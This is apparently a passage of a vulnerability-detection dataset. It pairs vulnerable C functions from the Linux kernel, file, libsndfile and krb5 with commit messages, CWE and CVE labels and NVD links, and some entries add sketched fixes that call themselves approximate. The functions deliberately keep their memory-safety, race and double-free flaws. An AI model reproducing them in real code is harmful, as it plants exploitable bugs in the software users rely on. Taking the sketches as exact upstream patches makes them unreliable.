unsigned char *p = to;
/* Reserve one byte for terminating \0 */
tolen--;
while (elen < fromlen) {
pc = (struct pathComponent *)(from + elen);
switch (pc->componentType) {
case 1:
/*
* Symlink points to some place which should be agreed
* upon between originator and receiver of the media. Ignore.
*/
if (pc->lengthComponentIdent > 0)
break;
/* Fall through */
case 2:
if (tolen == 0)
return -ENAMETOOLONG;
p = to;
*p++ = '/';
tolen--;
break;
case 3:
if (tolen < 3)
return -ENAMETOOLONG;
memcpy(p, "../", 3);
p += 3;
tolen -= 3;
break;
case 4:
if (tolen < 2)
return -ENAMETOOLONG;
memcpy(p, "./", 2);
p += 2;
tolen -= 2;
/* that would be . - just ignore */
break;
case 5:
comp_len = udf_get_filename(sb, pc->componentIdent,
pc->lengthComponentIdent,
p, tolen);
p += comp_len;
tolen -= comp_len;
if (tolen == 0)
return -ENAMETOOLONG;
*p++ = '/';
tolen--;
break;
}
elen += sizeof(struct pathComponent) + pc->lengthComponentIdent;
}
if (p > to + 1)
p[-1] = '\0';
else
p[0] = '\0';
return 0;
}
| 325,864,361,331,960,330,000,000,000,000,000,000,000 | symlink.c | 76,715,452,543,384,660,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2014-9730 | The udf_pc_to_char function in fs/udf/symlink.c in the Linux kernel before 3.18.2 relies on component lengths that are unused, which allows local users to cause a denial of service (system crash) via a crafted UDF filesystem image. | https://nvd.nist.gov/vuln/detail/CVE-2014-9730 |
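A hedged sketch of the added validation, phrased in terms of the variables of udf_pc_to_char() above (the upstream patch differs in detail): every pathComponent header, and for type 5 the identifier bytes behind it, must fit inside fromlen before being dereferenced, and the length field is ignored for component types that do not carry an identifier.

	while (elen < fromlen) {
		/* The fixed header must fit before componentType is read. */
		if (elen + (int)sizeof(struct pathComponent) > fromlen)
			break;
		pc = (struct pathComponent *)(from + elen);
		/* The identifier bytes must also lie inside the buffer. */
		if (pc->componentType == 5 &&
		    elen + (int)sizeof(struct pathComponent) +
				pc->lengthComponentIdent > fromlen)
			break;
		/* ... existing per-component handling ... */
		elen += sizeof(struct pathComponent) + pc->lengthComponentIdent;
	}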
1,596 | linux | 942080643bce061c3dd9d5718d3b745dcb39a8bc | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/942080643bce061c3dd9d5718d3b745dcb39a8bc | eCryptfs: Remove buggy and unnecessary write in file name decode routine
Dmitry Chernenkov used KASAN to discover that eCryptfs writes past the
end of the allocated buffer during encrypted filename decoding. This
fix corrects the issue by getting rid of the unnecessary 0 write when
the current bit offset is 2.
Signed-off-by: Michael Halcrow <mhalcrow@google.com>
Reported-by: Dmitry Chernenkov <dmitryc@google.com>
Suggested-by: Kees Cook <keescook@chromium.org>
Cc: stable@vger.kernel.org # v2.6.29+: 51ca58d eCryptfs: Filename Encryption: Encoding and encryption functions
Signed-off-by: Tyler Hicks <tyhicks@canonical.com> | 1 | ecryptfs_decode_from_filename(unsigned char *dst, size_t *dst_size,
const unsigned char *src, size_t src_size)
{
u8 current_bit_offset = 0;
size_t src_byte_offset = 0;
size_t dst_byte_offset = 0;
if (dst == NULL) {
(*dst_size) = ecryptfs_max_decoded_size(src_size);
goto out;
}
while (src_byte_offset < src_size) {
unsigned char src_byte =
filename_rev_map[(int)src[src_byte_offset]];
switch (current_bit_offset) {
case 0:
dst[dst_byte_offset] = (src_byte << 2);
current_bit_offset = 6;
break;
case 6:
dst[dst_byte_offset++] |= (src_byte >> 4);
dst[dst_byte_offset] = ((src_byte & 0xF)
<< 4);
current_bit_offset = 4;
break;
case 4:
dst[dst_byte_offset++] |= (src_byte >> 2);
dst[dst_byte_offset] = (src_byte << 6);
current_bit_offset = 2;
break;
case 2:
dst[dst_byte_offset++] |= (src_byte);
dst[dst_byte_offset] = 0;
current_bit_offset = 0;
break;
}
src_byte_offset++;
}
(*dst_size) = dst_byte_offset;
out:
return;
}
| 288,062,041,952,122,140,000,000,000,000,000,000,000 | crypto.c | 83,043,817,776,762,890,000,000,000,000,000,000,000 | [
"CWE-189"
] | CVE-2014-9683 | Off-by-one error in the ecryptfs_decode_from_filename function in fs/ecryptfs/crypto.c in the eCryptfs subsystem in the Linux kernel before 3.18.2 allows local users to cause a denial of service (buffer overflow and system crash) or possibly gain privileges via a crafted filename. | https://nvd.nist.gov/vuln/detail/CVE-2014-9683 |
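The overflow is precise: when the last 6-bit group lands at current_bit_offset == 2, dst_byte_offset++ can reach dst_size, and the follow-up dst[dst_byte_offset] = 0 then writes one byte past the allocation. The write is also unnecessary, because every case 0 pass assigns (rather than ORs) the next output byte. Per the commit, the fix simply drops the stray zero write:

		case 2:
			dst[dst_byte_offset++] |= (src_byte);
			current_bit_offset = 0;
			break;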
1,600 | linux | 4943ba16bbc2db05115707b3ff7b4874e9e3c560 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/4943ba16bbc2db05115707b3ff7b4874e9e3c560 | crypto: include crypto- module prefix in template
This adds the module loading prefix "crypto-" to the template lookup
as well.
For example, attempting to load 'vfat(blowfish)' via AF_ALG now correctly
includes the "crypto-" prefix at every level, correctly rejecting "vfat":
net-pf-38
algif-hash
crypto-vfat(blowfish)
crypto-vfat(blowfish)-all
crypto-vfat
Reported-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: Kees Cook <keescook@chromium.org>
Acked-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au> | 1 | struct crypto_template *crypto_lookup_template(const char *name)
{
return try_then_request_module(__crypto_lookup_template(name), "%s",
name);
}
| 116,020,862,207,451,470,000,000,000,000,000,000,000 | algapi.c | 187,872,088,690,328,180,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2014-9644 | The Crypto API in the Linux kernel before 3.18.5 allows local users to load arbitrary kernel modules via a bind system call for an AF_ALG socket with a parenthesized module template expression in the salg_name field, as demonstrated by the vfat(aes) expression, a different vulnerability than CVE-2013-7421. | https://nvd.nist.gov/vuln/detail/CVE-2014-9644 |
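Sketch of the patched lookup: the module request is qualified with the "crypto-" prefix, so a template name arriving via AF_ALG can only resolve inside the crypto module-alias namespace and can no longer coerce loading of arbitrary modules such as vfat.

	struct crypto_template *crypto_lookup_template(const char *name)
	{
		return try_then_request_module(__crypto_lookup_template(name),
					       "crypto-%s", name);
	}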
1,601 | file | 65437cee25199dbd385fb35901bc0011e164276c | https://github.com/file/file | https://github.com/file/file/commit/65437cee25199dbd385fb35901bc0011e164276c | Limit string printing to 100 chars, and add flags I forgot in the previous
commit. | 1 | donote(struct magic_set *ms, void *vbuf, size_t offset, size_t size,
int clazz, int swap, size_t align, int *flags, uint16_t *notecount)
{
Elf32_Nhdr nh32;
Elf64_Nhdr nh64;
size_t noff, doff;
uint32_t namesz, descsz;
unsigned char *nbuf = CAST(unsigned char *, vbuf);
if (*notecount == 0)
return 0;
--*notecount;
if (xnh_sizeof + offset > size) {
/*
* We're out of note headers.
*/
return xnh_sizeof + offset;
}
(void)memcpy(xnh_addr, &nbuf[offset], xnh_sizeof);
offset += xnh_sizeof;
namesz = xnh_namesz;
descsz = xnh_descsz;
if ((namesz == 0) && (descsz == 0)) {
/*
* We're out of note headers.
*/
return (offset >= size) ? offset : size;
}
if (namesz & 0x80000000) {
(void)file_printf(ms, ", bad note name size 0x%lx",
(unsigned long)namesz);
return 0;
}
if (descsz & 0x80000000) {
(void)file_printf(ms, ", bad note description size 0x%lx",
(unsigned long)descsz);
return 0;
}
noff = offset;
doff = ELF_ALIGN(offset + namesz);
if (offset + namesz > size) {
/*
* We're past the end of the buffer.
*/
return doff;
}
offset = ELF_ALIGN(doff + descsz);
if (doff + descsz > size) {
/*
* We're past the end of the buffer.
*/
return (offset >= size) ? offset : size;
}
if ((*flags & FLAGS_DID_OS_NOTE) == 0) {
if (do_os_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_BUILD_ID) == 0) {
if (do_bid_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_NETBSD_PAX) == 0) {
if (do_pax_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_CORE) == 0) {
if (do_core_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags, size, clazz))
return size;
}
if (namesz == 7 && strcmp((char *)&nbuf[noff], "NetBSD") == 0) {
switch (xnh_type) {
case NT_NETBSD_VERSION:
return size;
case NT_NETBSD_MARCH:
if (*flags & FLAGS_DID_NETBSD_MARCH)
return size;
if (file_printf(ms, ", compiled for: %.*s", (int)descsz,
(const char *)&nbuf[doff]) == -1)
return size;
break;
case NT_NETBSD_CMODEL:
if (*flags & FLAGS_DID_NETBSD_CMODEL)
return size;
if (file_printf(ms, ", compiler model: %.*s",
(int)descsz, (const char *)&nbuf[doff]) == -1)
return size;
break;
default:
if (*flags & FLAGS_DID_NETBSD_UNKNOWN)
return size;
if (file_printf(ms, ", note=%u", xnh_type) == -1)
return size;
break;
}
return size;
}
return offset;
}
| 206,842,038,504,383,380,000,000,000,000,000,000,000 | readelf.c | 196,087,564,373,822,200,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2014-9621 | The ELF parser in file 5.16 through 5.21 allows remote attackers to cause a denial of service via a long string. | https://nvd.nist.gov/vuln/detail/CVE-2014-9621 |
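The descsz values above feed "%.*s" format directives directly, so a crafted ELF note can make file(1) emit an arbitrarily long string. One plausible way to realize the commit subject, shown here as an assumption rather than the verbatim patch (the upstream change may clamp at the individual print sites instead), is to cap the description length once, before the NetBSD note cases run:

	/* Cap attacker-controlled note strings before any "%.*s" printing. */
	if (descsz > 100)
		descsz = 100;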
1,611 | linux | 4e2024624e678f0ebb916e6192bd23c1f9fdf696 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/4e2024624e678f0ebb916e6192bd23c1f9fdf696 | isofs: Fix unchecked printing of ER records
We didn't check length of rock ridge ER records before printing them.
Thus corrupted isofs image can cause us to access and print some memory
behind the buffer with obvious consequences.
Reported-and-tested-by: Carl Henrik Lunde <chlunde@ping.uio.no>
CC: stable@vger.kernel.org
Signed-off-by: Jan Kara <jack@suse.cz> | 1 | parse_rock_ridge_inode_internal(struct iso_directory_record *de,
struct inode *inode, int flags)
{
int symlink_len = 0;
int cnt, sig;
unsigned int reloc_block;
struct inode *reloc;
struct rock_ridge *rr;
int rootflag;
struct rock_state rs;
int ret = 0;
if (!ISOFS_SB(inode->i_sb)->s_rock)
return 0;
init_rock_state(&rs, inode);
setup_rock_ridge(de, inode, &rs);
if (flags & RR_REGARD_XA) {
rs.chr += 14;
rs.len -= 14;
if (rs.len < 0)
rs.len = 0;
}
repeat:
while (rs.len > 2) { /* There may be one byte for padding somewhere */
rr = (struct rock_ridge *)rs.chr;
/*
* Ignore rock ridge info if rr->len is out of range, but
* don't return -EIO because that would make the file
* invisible.
*/
if (rr->len < 3)
goto out; /* Something got screwed up here */
sig = isonum_721(rs.chr);
if (rock_check_overflow(&rs, sig))
goto eio;
rs.chr += rr->len;
rs.len -= rr->len;
/*
* As above, just ignore the rock ridge info if rr->len
* is bogus.
*/
if (rs.len < 0)
goto out; /* Something got screwed up here */
switch (sig) {
#ifndef CONFIG_ZISOFS /* No flag for SF or ZF */
case SIG('R', 'R'):
if ((rr->u.RR.flags[0] &
(RR_PX | RR_TF | RR_SL | RR_CL)) == 0)
goto out;
break;
#endif
case SIG('S', 'P'):
if (check_sp(rr, inode))
goto out;
break;
case SIG('C', 'E'):
rs.cont_extent = isonum_733(rr->u.CE.extent);
rs.cont_offset = isonum_733(rr->u.CE.offset);
rs.cont_size = isonum_733(rr->u.CE.size);
break;
case SIG('E', 'R'):
ISOFS_SB(inode->i_sb)->s_rock = 1;
printk(KERN_DEBUG "ISO 9660 Extensions: ");
{
int p;
for (p = 0; p < rr->u.ER.len_id; p++)
printk("%c", rr->u.ER.data[p]);
}
printk("\n");
break;
case SIG('P', 'X'):
inode->i_mode = isonum_733(rr->u.PX.mode);
set_nlink(inode, isonum_733(rr->u.PX.n_links));
i_uid_write(inode, isonum_733(rr->u.PX.uid));
i_gid_write(inode, isonum_733(rr->u.PX.gid));
break;
case SIG('P', 'N'):
{
int high, low;
high = isonum_733(rr->u.PN.dev_high);
low = isonum_733(rr->u.PN.dev_low);
/*
* The Rock Ridge standard specifies that if
* sizeof(dev_t) <= 4, then the high field is
* unused, and the device number is completely
* stored in the low field. Some writers may
* ignore this subtlety,
* and as a result we test to see if the entire
* device number is
* stored in the low field, and use that.
*/
if ((low & ~0xff) && high == 0) {
inode->i_rdev =
MKDEV(low >> 8, low & 0xff);
} else {
inode->i_rdev =
MKDEV(high, low);
}
}
break;
case SIG('T', 'F'):
/*
* Some RRIP writers incorrectly place ctime in the
* TF_CREATE field. Try to handle this correctly for
* either case.
*/
/* Rock ridge never appears on a High Sierra disk */
cnt = 0;
if (rr->u.TF.flags & TF_CREATE) {
inode->i_ctime.tv_sec =
iso_date(rr->u.TF.times[cnt++].time,
0);
inode->i_ctime.tv_nsec = 0;
}
if (rr->u.TF.flags & TF_MODIFY) {
inode->i_mtime.tv_sec =
iso_date(rr->u.TF.times[cnt++].time,
0);
inode->i_mtime.tv_nsec = 0;
}
if (rr->u.TF.flags & TF_ACCESS) {
inode->i_atime.tv_sec =
iso_date(rr->u.TF.times[cnt++].time,
0);
inode->i_atime.tv_nsec = 0;
}
if (rr->u.TF.flags & TF_ATTRIBUTES) {
inode->i_ctime.tv_sec =
iso_date(rr->u.TF.times[cnt++].time,
0);
inode->i_ctime.tv_nsec = 0;
}
break;
case SIG('S', 'L'):
{
int slen;
struct SL_component *slp;
struct SL_component *oldslp;
slen = rr->len - 5;
slp = &rr->u.SL.link;
inode->i_size = symlink_len;
while (slen > 1) {
rootflag = 0;
switch (slp->flags & ~1) {
case 0:
inode->i_size +=
slp->len;
break;
case 2:
inode->i_size += 1;
break;
case 4:
inode->i_size += 2;
break;
case 8:
rootflag = 1;
inode->i_size += 1;
break;
default:
printk("Symlink component flag "
"not implemented\n");
}
slen -= slp->len + 2;
oldslp = slp;
slp = (struct SL_component *)
(((char *)slp) + slp->len + 2);
if (slen < 2) {
if (((rr->u.SL.
flags & 1) != 0)
&&
((oldslp->
flags & 1) == 0))
inode->i_size +=
1;
break;
}
/*
* If this component record isn't
* continued, then append a '/'.
*/
if (!rootflag
&& (oldslp->flags & 1) == 0)
inode->i_size += 1;
}
}
symlink_len = inode->i_size;
break;
case SIG('R', 'E'):
printk(KERN_WARNING "Attempt to read inode for "
"relocated directory\n");
goto out;
case SIG('C', 'L'):
if (flags & RR_RELOC_DE) {
printk(KERN_ERR
"ISOFS: Recursive directory relocation "
"is not supported\n");
goto eio;
}
reloc_block = isonum_733(rr->u.CL.location);
if (reloc_block == ISOFS_I(inode)->i_iget5_block &&
ISOFS_I(inode)->i_iget5_offset == 0) {
printk(KERN_ERR
"ISOFS: Directory relocation points to "
"itself\n");
goto eio;
}
ISOFS_I(inode)->i_first_extent = reloc_block;
reloc = isofs_iget_reloc(inode->i_sb, reloc_block, 0);
if (IS_ERR(reloc)) {
ret = PTR_ERR(reloc);
goto out;
}
inode->i_mode = reloc->i_mode;
set_nlink(inode, reloc->i_nlink);
inode->i_uid = reloc->i_uid;
inode->i_gid = reloc->i_gid;
inode->i_rdev = reloc->i_rdev;
inode->i_size = reloc->i_size;
inode->i_blocks = reloc->i_blocks;
inode->i_atime = reloc->i_atime;
inode->i_ctime = reloc->i_ctime;
inode->i_mtime = reloc->i_mtime;
iput(reloc);
break;
#ifdef CONFIG_ZISOFS
case SIG('Z', 'F'): {
int algo;
if (ISOFS_SB(inode->i_sb)->s_nocompress)
break;
algo = isonum_721(rr->u.ZF.algorithm);
if (algo == SIG('p', 'z')) {
int block_shift =
isonum_711(&rr->u.ZF.parms[1]);
if (block_shift > 17) {
printk(KERN_WARNING "isofs: "
"Can't handle ZF block "
"size of 2^%d\n",
block_shift);
} else {
/*
* Note: we don't change
* i_blocks here
*/
ISOFS_I(inode)->i_file_format =
isofs_file_compressed;
/*
* Parameters to compression
* algorithm (header size,
* block size)
*/
ISOFS_I(inode)->i_format_parm[0] =
isonum_711(&rr->u.ZF.parms[0]);
ISOFS_I(inode)->i_format_parm[1] =
isonum_711(&rr->u.ZF.parms[1]);
inode->i_size =
isonum_733(rr->u.ZF.
real_size);
}
} else {
printk(KERN_WARNING
"isofs: Unknown ZF compression "
"algorithm: %c%c\n",
rr->u.ZF.algorithm[0],
rr->u.ZF.algorithm[1]);
}
break;
}
#endif
default:
break;
}
}
ret = rock_continue(&rs);
if (ret == 0)
goto repeat;
if (ret == 1)
ret = 0;
out:
kfree(rs.buffer);
return ret;
eio:
ret = -EIO;
goto out;
}
| 76,826,098,986,089,410,000,000,000,000,000,000,000 | rock.c | 282,024,907,067,004,600,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2014-9584 | The parse_rock_ridge_inode_internal function in fs/isofs/rock.c in the Linux kernel before 3.18.2 does not validate a length value in the Extensions Reference (ER) System Use Field, which allows local users to obtain sensitive information from kernel memory via a crafted iso9660 image. | https://nvd.nist.gov/vuln/detail/CVE-2014-9584 |
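The 'ER' case trusts rr->u.ER.len_id even though nothing guarantees those bytes sit inside the system-use entry, so the printk loop can walk past the buffer. A sketch close to the upstream patch, bounding the identifier against rr->len before anything is printed:

		case SIG('E', 'R'):
			/* Invalid length of ER tag id? */
			if (rr->u.ER.len_id + offsetof(struct rock_ridge,
						u.ER.data) > rr->len)
				goto out;
			ISOFS_SB(inode->i_sb)->s_rock = 1;
			/* ... existing printk of the extension id follows ... */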
1,612 | linux | a3a8784454692dd72e5d5d34dcdab17b4420e74c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/a3a8784454692dd72e5d5d34dcdab17b4420e74c | KEYS: close race between key lookup and freeing
When a key is being garbage collected, it's key->user would get put before
the ->destroy() callback is called, where the key is removed from it's
respective tracking structures.
This leaves a key hanging in a semi-invalid state which leaves a window open
for a different task to try an access key->user. An example is
find_keyring_by_name() which would dereference key->user for a key that is
in the process of being garbage collected (where key->user was freed but
->destroy() wasn't called yet - so it's still present in the linked list).
This would cause either a panic, or corrupt memory.
Fixes CVE-2014-9529.
Signed-off-by: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: David Howells <dhowells@redhat.com> | 1 | static noinline void key_gc_unused_keys(struct list_head *keys)
{
while (!list_empty(keys)) {
struct key *key =
list_entry(keys->next, struct key, graveyard_link);
list_del(&key->graveyard_link);
kdebug("- %u", key->serial);
key_check(key);
security_key_free(key);
/* deal with the user's key tracking and quota */
if (test_bit(KEY_FLAG_IN_QUOTA, &key->flags)) {
spin_lock(&key->user->lock);
key->user->qnkeys--;
key->user->qnbytes -= key->quotalen;
spin_unlock(&key->user->lock);
}
atomic_dec(&key->user->nkeys);
if (test_bit(KEY_FLAG_INSTANTIATED, &key->flags))
atomic_dec(&key->user->nikeys);
key_user_put(key->user);
/* now throw away the key memory */
if (key->type->destroy)
key->type->destroy(key);
kfree(key->description);
#ifdef KEY_DEBUGGING
key->magic = KEY_DEBUG_MAGIC_X;
#endif
kmem_cache_free(key_jar, key);
}
}
| 146,841,926,446,616,660,000,000,000,000,000,000,000 | None | null | [
"CWE-362"
] | CVE-2014-9529 | Race condition in the key_gc_unused_keys function in security/keys/gc.c in the Linux kernel through 3.18.2 allows local users to cause a denial of service (memory corruption or panic) or possibly have unspecified other impact via keyctl commands that trigger access to a key structure member during garbage collection of a key. | https://nvd.nist.gov/vuln/detail/CVE-2014-9529 |
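The race exists because key->user is released while the key is still discoverable through type-level structures such as the keyring name list that find_keyring_by_name() walks. Sketch of the reordered teardown, using only names from the function above: ->destroy() unlinks the key first, and only then is the accounting state on key->user touched and the reference dropped.

		/* Throw away the key data first, so ->destroy() removes the
		 * key from its tracking structures while key->user is
		 * still valid. */
		security_key_free(key);
		if (key->type->destroy)
			key->type->destroy(key);

		/* Only now is it safe to touch and release the user record. */
		if (test_bit(KEY_FLAG_IN_QUOTA, &key->flags)) {
			spin_lock(&key->user->lock);
			key->user->qnkeys--;
			key->user->qnbytes -= key->quotalen;
			spin_unlock(&key->user->lock);
		}
		atomic_dec(&key->user->nkeys);
		if (test_bit(KEY_FLAG_INSTANTIATED, &key->flags))
			atomic_dec(&key->user->nikeys);
		key_user_put(key->user);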
1,613 | libsndfile | dbe14f00030af5d3577f4cabbf9861db59e9c378 | https://github.com/erikd/libsndfile | https://github.com/erikd/libsndfile/commit/dbe14f00030af5d3577f4cabbf9861db59e9c378 | src/sd2.c : Fix two potential buffer read overflows.
Closes: https://github.com/erikd/libsndfile/issues/93 | 1 | sd2_parse_rsrc_fork (SF_PRIVATE *psf)
{ SD2_RSRC rsrc ;
int k, marker, error = 0 ;
psf_use_rsrc (psf, SF_TRUE) ;
memset (&rsrc, 0, sizeof (rsrc)) ;
rsrc.rsrc_len = psf_get_filelen (psf) ;
psf_log_printf (psf, "Resource length : %d (0x%04X)\n", rsrc.rsrc_len, rsrc.rsrc_len) ;
if (rsrc.rsrc_len > SIGNED_SIZEOF (psf->header))
{ rsrc.rsrc_data = calloc (1, rsrc.rsrc_len) ;
rsrc.need_to_free_rsrc_data = SF_TRUE ;
}
else
{
rsrc.rsrc_data = psf->header ;
rsrc.need_to_free_rsrc_data = SF_FALSE ;
} ;
/* Read in the whole lot. */
psf_fread (rsrc.rsrc_data, rsrc.rsrc_len, 1, psf) ;
/* Reset the header storage because we have changed to the rsrcdes. */
psf->headindex = psf->headend = rsrc.rsrc_len ;
rsrc.data_offset = read_rsrc_int (&rsrc, 0) ;
rsrc.map_offset = read_rsrc_int (&rsrc, 4) ;
rsrc.data_length = read_rsrc_int (&rsrc, 8) ;
rsrc.map_length = read_rsrc_int (&rsrc, 12) ;
if (rsrc.data_offset == 0x51607 && rsrc.map_offset == 0x20000)
{ psf_log_printf (psf, "Trying offset of 0x52 bytes.\n") ;
rsrc.data_offset = read_rsrc_int (&rsrc, 0x52 + 0) + 0x52 ;
rsrc.map_offset = read_rsrc_int (&rsrc, 0x52 + 4) + 0x52 ;
rsrc.data_length = read_rsrc_int (&rsrc, 0x52 + 8) ;
rsrc.map_length = read_rsrc_int (&rsrc, 0x52 + 12) ;
} ;
psf_log_printf (psf, " data offset : 0x%04X\n map offset : 0x%04X\n"
" data length : 0x%04X\n map length : 0x%04X\n",
rsrc.data_offset, rsrc.map_offset, rsrc.data_length, rsrc.map_length) ;
if (rsrc.data_offset > rsrc.rsrc_len)
{ psf_log_printf (psf, "Error : rsrc.data_offset (%d, 0x%x) > len\n", rsrc.data_offset, rsrc.data_offset) ;
error = SFE_SD2_BAD_DATA_OFFSET ;
goto parse_rsrc_fork_cleanup ;
} ;
if (rsrc.map_offset > rsrc.rsrc_len)
{ psf_log_printf (psf, "Error : rsrc.map_offset > len\n") ;
error = SFE_SD2_BAD_MAP_OFFSET ;
goto parse_rsrc_fork_cleanup ;
} ;
if (rsrc.data_length > rsrc.rsrc_len)
{ psf_log_printf (psf, "Error : rsrc.data_length > len\n") ;
error = SFE_SD2_BAD_DATA_LENGTH ;
goto parse_rsrc_fork_cleanup ;
} ;
if (rsrc.map_length > rsrc.rsrc_len)
{ psf_log_printf (psf, "Error : rsrc.map_length > len\n") ;
error = SFE_SD2_BAD_MAP_LENGTH ;
goto parse_rsrc_fork_cleanup ;
} ;
if (rsrc.data_offset + rsrc.data_length != rsrc.map_offset || rsrc.map_offset + rsrc.map_length != rsrc.rsrc_len)
{ psf_log_printf (psf, "Error : This does not look like a MacOSX resource fork.\n") ;
error = SFE_SD2_BAD_RSRC ;
goto parse_rsrc_fork_cleanup ;
} ;
if (rsrc.map_offset + 28 >= rsrc.rsrc_len)
{ psf_log_printf (psf, "Bad map offset (%d + 28 > %d).\n", rsrc.map_offset, rsrc.rsrc_len) ;
error = SFE_SD2_BAD_RSRC ;
goto parse_rsrc_fork_cleanup ;
} ;
rsrc.string_offset = rsrc.map_offset + read_rsrc_short (&rsrc, rsrc.map_offset + 26) ;
if (rsrc.string_offset > rsrc.rsrc_len)
{ psf_log_printf (psf, "Bad string offset (%d).\n", rsrc.string_offset) ;
error = SFE_SD2_BAD_RSRC ;
goto parse_rsrc_fork_cleanup ;
} ;
rsrc.type_offset = rsrc.map_offset + 30 ;
rsrc.type_count = read_rsrc_short (&rsrc, rsrc.map_offset + 28) + 1 ;
if (rsrc.type_count < 1)
{ psf_log_printf (psf, "Bad type count.\n") ;
error = SFE_SD2_BAD_RSRC ;
goto parse_rsrc_fork_cleanup ;
} ;
rsrc.item_offset = rsrc.type_offset + rsrc.type_count * 8 ;
if (rsrc.item_offset < 0 || rsrc.item_offset > rsrc.rsrc_len)
{ psf_log_printf (psf, "Bad item offset (%d).\n", rsrc.item_offset) ;
error = SFE_SD2_BAD_RSRC ;
goto parse_rsrc_fork_cleanup ;
} ;
rsrc.str_index = -1 ;
for (k = 0 ; k < rsrc.type_count ; k ++)
{ marker = read_rsrc_marker (&rsrc, rsrc.type_offset + k * 8) ;
if (marker == STR_MARKER)
{ rsrc.str_index = k ;
rsrc.str_count = read_rsrc_short (&rsrc, rsrc.type_offset + k * 8 + 4) + 1 ;
error = parse_str_rsrc (psf, &rsrc) ;
goto parse_rsrc_fork_cleanup ;
} ;
} ;
psf_log_printf (psf, "No 'STR ' resource.\n") ;
error = SFE_SD2_BAD_RSRC ;
parse_rsrc_fork_cleanup :
psf_use_rsrc (psf, SF_FALSE) ;
if (rsrc.need_to_free_rsrc_data)
free (rsrc.rsrc_data) ;
return error ;
} /* sd2_parse_rsrc_fork */
| 340,051,541,888,924,920,000,000,000,000,000,000,000 | None | null | [
"CWE-119"
] | CVE-2014-9496 | The sd2_parse_rsrc_fork function in sd2.c in libsndfile allows attackers to have unspecified impact via vectors related to a (1) map offset or (2) rsrc marker, which triggers an out-of-bounds read. | https://nvd.nist.gov/vuln/detail/CVE-2014-9496 |
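Both overflows stem from the helper reads (read_rsrc_int / read_rsrc_short / read_rsrc_marker) being handed offsets derived from file data without verifying that the bytes they fetch lie inside rsrc_len. A hedged sketch of the defensive-accessor pattern the fix applies, in libsndfile's brace style; the helper name here is hypothetical, as the actual patch hardens the existing readers and their call sites:

	static inline int
	read_rsrc_int_checked (const SD2_RSRC * rsrc, int offset, int * value)
	{	/* Refuse any 4-byte big-endian read that strays outside the fork. */
		if (offset < 0 || offset + 4 > rsrc->rsrc_len)
			return -1 ;
		*value = (rsrc->rsrc_data [offset] << 24) + (rsrc->rsrc_data [offset + 1] << 16)
					+ (rsrc->rsrc_data [offset + 2] << 8) + rsrc->rsrc_data [offset + 3] ;
		return 0 ;
	} /* read_rsrc_int_checked */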
1,618 | krb5 | a197e92349a4aa2141b5dff12e9dd44c2a2166e3 | https://github.com/krb5/krb5 | https://github.com/krb5/krb5/commit/a197e92349a4aa2141b5dff12e9dd44c2a2166e3 | Fix kadm5/gssrpc XDR double free [CVE-2014-9421]
[MITKRB5-SA-2015-001] In auth_gssapi_unwrap_data(), do not free
partial deserialization results upon failure to deserialize. This
responsibility belongs to the callers, svctcp_getargs() and
svcudp_getargs(); doing it in the unwrap function results in freeing
the results twice.
In xdr_krb5_tl_data() and xdr_krb5_principal(), null out the pointers
we are freeing, as other XDR functions such as xdr_bytes() and
xdr_string().
ticket: 8056 (new)
target_version: 1.13.1
tags: pullup | 1 | bool_t auth_gssapi_unwrap_data(
OM_uint32 *major,
OM_uint32 *minor,
gss_ctx_id_t context,
uint32_t seq_num,
XDR *in_xdrs,
bool_t (*xdr_func)(),
caddr_t xdr_ptr)
{
gss_buffer_desc in_buf, out_buf;
XDR temp_xdrs;
uint32_t verf_seq_num;
int conf, qop;
unsigned int length;
PRINTF(("gssapi_unwrap_data: starting\n"));
*major = GSS_S_COMPLETE;
*minor = 0; /* assumption */
in_buf.value = NULL;
out_buf.value = NULL;
if (! xdr_bytes(in_xdrs, (char **) &in_buf.value,
&length, (unsigned int) -1)) {
PRINTF(("gssapi_unwrap_data: deserializing encrypted data failed\n"));
temp_xdrs.x_op = XDR_FREE;
(void)xdr_bytes(&temp_xdrs, (char **) &in_buf.value, &length,
(unsigned int) -1);
return FALSE;
}
in_buf.length = length;
*major = gss_unseal(minor, context, &in_buf, &out_buf, &conf,
&qop);
free(in_buf.value);
if (*major != GSS_S_COMPLETE)
return FALSE;
PRINTF(("gssapi_unwrap_data: %llu bytes data, %llu bytes sealed\n",
(unsigned long long)out_buf.length,
(unsigned long long)in_buf.length));
xdrmem_create(&temp_xdrs, out_buf.value, out_buf.length, XDR_DECODE);
/* deserialize the sequence number */
if (! xdr_u_int32(&temp_xdrs, &verf_seq_num)) {
PRINTF(("gssapi_unwrap_data: deserializing verf_seq_num failed\n"));
gss_release_buffer(minor, &out_buf);
XDR_DESTROY(&temp_xdrs);
return FALSE;
}
if (verf_seq_num != seq_num) {
PRINTF(("gssapi_unwrap_data: seq %d specified, read %d\n",
seq_num, verf_seq_num));
gss_release_buffer(minor, &out_buf);
XDR_DESTROY(&temp_xdrs);
return FALSE;
}
PRINTF(("gssapi_unwrap_data: unwrap seq_num %d okay\n", verf_seq_num));
/* deserialize the arguments into xdr_ptr */
if (! (*xdr_func)(&temp_xdrs, xdr_ptr)) {
PRINTF(("gssapi_unwrap_data: deserializing arguments failed\n"));
gss_release_buffer(minor, &out_buf);
xdr_free(xdr_func, xdr_ptr);
XDR_DESTROY(&temp_xdrs);
return FALSE;
}
PRINTF(("gssapi_unwrap_data: succeeding\n\n"));
gss_release_buffer(minor, &out_buf);
XDR_DESTROY(&temp_xdrs);
return TRUE;
}
